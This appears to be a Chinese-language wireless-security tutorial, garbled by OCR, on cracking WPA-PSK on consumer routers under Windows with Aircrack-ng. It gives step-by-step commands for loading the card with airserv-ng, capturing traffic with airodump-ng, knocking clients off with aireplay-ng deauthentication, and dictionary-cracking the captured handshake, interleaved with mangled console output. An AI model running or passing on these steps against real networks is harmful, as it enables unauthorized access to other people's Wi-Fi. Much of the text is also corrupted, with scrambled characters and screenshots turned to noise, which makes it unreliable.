無線安全教程5---Windows下破解無線WPA-PSK加密

1、V1SECURITYerOneWireless Sec urity Training無線安全系列教程Windows下破解無線WPA-PSK 加密適用對(duì)象：目前市面主流無線路由器如Linksys、Dlink、TPLink、BelKin等D . 1 使用 Aircrack-ng for Windows由于在Windows 環(huán)境下不能如Linux環(huán)境般直接調(diào)用無線網(wǎng)卡，所以需要使用其它工具來將無線網(wǎng)卡載入，以便攻擊工具能夠正常使用。在無線攻擊套裝Aircrack-ng 的Win dows 版本下內(nèi)置了這樣的工具，就是airserv- ng 。步驟 1 :打開 cmd，輸入 cd aircrack f

2、ull 進(jìn)入到 aircrack-ng for Windows版本所在目錄，輸入 airserv-ng，可看到C： airpack FuillairseFuUsae nairserv-ng 卜PTCP poit tolisten on-Hviifi deviceto sevuekcchan to stt ondebus levc 1參數(shù)解釋:-P指定監(jiān)聽的端口，即提供連接服務(wù)的端口，默認(rèn)為666 ;-d載入無線網(wǎng)卡設(shè)備，需要驅(qū)動(dòng)支持；-c指定啟動(dòng)工作頻道，一般設(shè)置為預(yù)攻擊AP的工作頻道，默認(rèn)為 1-vdebug調(diào)試級(jí)別設(shè)定，第一步就是使用airserv- ng來載入我們當(dāng)前使用的無線網(wǎng)卡，為后

3、續(xù)破解準(zhǔn)備，命令如下:airserv -ng-d commview.dll|debug ”或者airserv -ng-d commview.dll|my adapter id”輸入完后airserv-ng會(huì)自動(dòng)搜尋現(xiàn)有無線網(wǎng)卡，會(huì)有提示，選擇正確的無線網(wǎng)卡直接輸入y，此時(shí)airserv-ng就在正常載入驅(qū)動(dòng)后，同時(shí)開始監(jiān)聽本地的666端口，換句話說，其它計(jì)算機(jī)上的用戶也可以連接到這個(gè)端口來使用這塊網(wǎng)卡，往：命令找示符-airserv-ng -d commviewdil | debugC;aircrack Fullairscruns( -d conmuiEw.dll(debugOpencardl

4、ewd 11!dehuName : ICDininU lewPHO/W ire less 2200BG Network Connect Ionffet_suid： name： desc： NETGEAR MG511v2 54Mbps Wireless PC Cajd -數(shù)據(jù)包計(jì)劃程序微型端口Does this look like ynuip card? yZn ySetting chan 1Openlogport 666Serviog commuiew.dll Sdebugf chan I on port 666Connect from 127.0,0L1Connect fron 127-00

5、L1Made By Christopher YangZerOneWirelessSec urityTraining無線安全系列教程步驟2 :接下來，可以使用 airodump-ng來搜索當(dāng)前無線環(huán)境，注意，要另開一個(gè)cmd ,再輸入命令如下：airodump-ng127.0.0.1: 666Made By Christopher YangMade By Christopher Yang、；命警覆示符-airodump-ng 127.0.0,1:666CH 8 H Elapsed：16 sJf 2007-09-2229:19BSIDPURBeacons#Datail/sCHMBEHCCIPHER

6、 AUTHESSID55250736.UFATK1PPSKTrueBSSIDSTATIONPWFRatePacketsProbes(not associated00：18：4D：78：B7：F4988-Q02True如上圖，當(dāng)確定預(yù)攻擊目標(biāo)AP的頻道后，使用鍵盤組和Ctrl + C中斷，即可使用如下參數(shù)來精確定位目標(biāo)：airodump-ng-cha nnel nu mber -wfile name127.0.0.1:666這里我們輸入 airodump-ng-channel 7 -wonewpa127.0.0.1:666回車可看到下圖：c命令理示 1? - airudump-rtg - cha

7、nnel 7 -w onewpa 127.0.0,11&66-|DjCH 7 Elapsed：1 nin (2007-09-222&-21BSSIDPtffi ftXQBeaconsIt DataCHMB EMCGIFHEHAUTH 隣00：17：?n：68；F6：7B5526657330754. WPATKIPPSK TBSSIDSTATIONPWB RaceLostPacketsProbes00:1a：4D：78：B7：F41030- 0054True步驟3 :現(xiàn)在，就可以和前面在BackTrack2 講述的一樣進(jìn)行 Deauth 攻擊了，另開一個(gè)cmd，輸入:aireplay-ng-01

8、 -a APs MAC 127.0.0.1:666Made By Christopher YangWSECURITYZerOneWirelessSec urityTraining無線安全系列教程Made By Christopher YangC ： Sjiisrciack FullJair-Epla-ng =01 1 -a 010=丄 =127. B. 0.1 6&6OariiiQGt inn 呂 to 127-0 . B. 1 pa pt* - Connecticin successful2：22 ：36 Wait in gr For heacoR frane CBSSID： 00：l?：9

9、fl ：68 ：F6：7B 20=22：38 Ha such BSSIB available.NH： this attack is more effective wFien targfeting a connected wire less client -c .2022*38 Sending DeAuth eo broadcast BSS D= 0 = 17*9A-B =F6 7B1 wijiiFitBC ； Ope rat lion naw xh； progi*BS&在有時(shí)候，會(huì)看到上面命令在結(jié)束時(shí)出現(xiàn) wi_write:Operatio nnow progress 這樣的提示，這個(gè)提示在很

10、多無線網(wǎng)卡下都會(huì)出現(xiàn)，意思是當(dāng)前進(jìn)程調(diào)用被占用，我們的Deauth攻擊在大多數(shù)情況下并不會(huì)受此影響。步驟4 :再開一個(gè)cmd，輸入命令查看是否捕獲到WPA握手,aircrack-ng捕獲的數(shù)據(jù)包名如果沒有捕獲到WPA握手，就會(huì)有下圖顯示0 handshake ，這個(gè)時(shí)候切回到剛才aireplay-ng所在cmd 中重復(fù)進(jìn)行 Deauth 攻擊。C： aircrack Fullaircrconewpa*capOpeninsf onewpa-01 .capRed 365 packets.tt BSSIDESSIDEncryption1 00：17;?ft=68：P6：7B TrueWPA Choo

11、sifig f irst netuork as t arge t.Opening oneupa01.capPspec if 1/ ft dictionary Cupt ion -w.攻擊過程中注意觀察當(dāng)我們的airodump-ng 界面，當(dāng)出現(xiàn)下列提示時(shí)，就表示成功截獲到WPA握手?jǐn)?shù)據(jù)包。c i 酣令援示符-airndump-ng -channel 7 -w onewpa 1274J.0.1666 v -3CH 7 H Elap&ed：B mins II20?-09-2220:28 JL WPft handshake: ILJ0：17：9A：6B：F6：ESSIDPWB RKQBeacunst

12、tData,#/sCtiHB ENCCIPHEfi AUTH ES00：17：9A：6S:F6：7B51314601231Q754 UPATKIPPSK TBSIISTftTIOHPURRateLostPacketsProbes00：17：?n；68：F6：7B00：09：2D:F4：5F：61910-004029TPLIHK,Truenot associatill00：18:4D：78：B7：F430-Q048?True這個(gè)時(shí)候再次使用aircrack-ng打開捕獲的數(shù)據(jù)包，就可以看到截獲到WPA 的顯示了，此時(shí)，便可以進(jìn)行WPA本地破解了。ZerOneWirelessSec urityTr

13、aining無線安全系列教程C：aii*cr*ck Full4ii*cr4ck-ng oneupd*.capOpening onewpa01,capHead 16354 packets.ESSIOEncrypt ion1WB：17：9fi：68：F6：7B TrueUFA Choosing f irst network as target.Open inf qnewpaQl capPlease spec a dictionft .輸入on ewpa*.capaircrack-ng-w password.txt這里介紹一個(gè)小技巧，可以在輸入數(shù)據(jù)包名后面加一個(gè)*號(hào)，來自動(dòng)將捕獲的該名稱所有數(shù)據(jù)包整

14、合導(dǎo)入。回車后，如下圖Made By Christopher YangMade By Christopher Yang如在Linux下破解 WPA 一般耐心地等待，就可以看到WPA密鑰成功解出了。Made By Christopher YangflSECURITYgerOneWireless Sec urity Training無線安全系列教程Made By Christopher YangMade By Christopher YangD . 2 使用 Aircrack -ng for Win dows的細(xì)節(jié)放大:1 .在Windows 下使用aircrack-ng 來進(jìn)行 WPA破解時(shí)，系

15、統(tǒng)會(huì)明顯變得緩慢，CPU占有率也會(huì)在短期內(nèi)達(dá)到高峰值，如下圖，筆者筆記本的配置是訊馳1.73，內(nèi)存為1G的DDR667，可依然是比較緩慢，不過這在運(yùn)行破解程序的系統(tǒng)上很常見，所以建議在破解 的時(shí)候就不要進(jìn)行其它大的交互操作。.i ai.xA ire racking 1.0 rt87Made By Christopher YangMade By Christopher Yang山一 Window枉善管薛曙J 73872 ke帀產(chǎn)立件仲弔記錄哩口擊阿1用戶應(yīng)用握序淹程CT1T慎用Current passplipai-sLDO玄10S29物理內(nèi)寺備總數(shù)1Q47960可角數(shù)5724&D不紜舞芬ET20

16、W息數(shù)斕數(shù)進(jìn)程救2 0 7 1 4 ft B ? 0 B 0 fl 7 4 s 3 c 8 FIJC5 9 0 s B 夕llc 1 1 D 1 aF創(chuàng)內(nèi) s 6 1 DMkistcr Key卜;FAPOL HMA-Made By Christopher Yang認(rèn)可用呈曲總遜5IQ772釀制2S1A310檢（!?內(nèi)存曲總遜9TE24姑頁數(shù)43596耒另頁5*236Made By Christopher YangMade By Christopher Yang進(jìn)程數(shù):56CMJ使冃：1叫提交更改:5Q7M； Z+&CH2 .在無法使用 airserv-ng -d commview.dll|de

17、bug ” 命令，而不得不使用 airserv -ng-d commview.dll|my adapter id”來載入網(wǎng)卡時(shí)， 很多人會(huì)面臨不知道如何查找網(wǎng)卡設(shè)備ID號(hào)的問題，這里介紹一個(gè) Windows自帶的getmac 命令， SECURITYCerOneWireless Sec urity Training無線安全系列教程 可以很有效的幫助我們查找網(wǎng)絡(luò)設(shè)備號(hào)，找到MAC對(duì)應(yīng)的設(shè)備ID，鼠標(biāo)右鍵復(fù)制即可。3 .對(duì)于airserv-ng而言，其功能遠(yuǎn)不止用于Windows 本地破解這么單一。在將本機(jī)無線網(wǎng)卡設(shè)置為監(jiān)聽后，其它內(nèi)網(wǎng)計(jì)算機(jī)都可以連接到該端口，來使用此無線網(wǎng)卡進(jìn)行攻擊， 換句話說，攻擊者甚至可以不在AP的有效范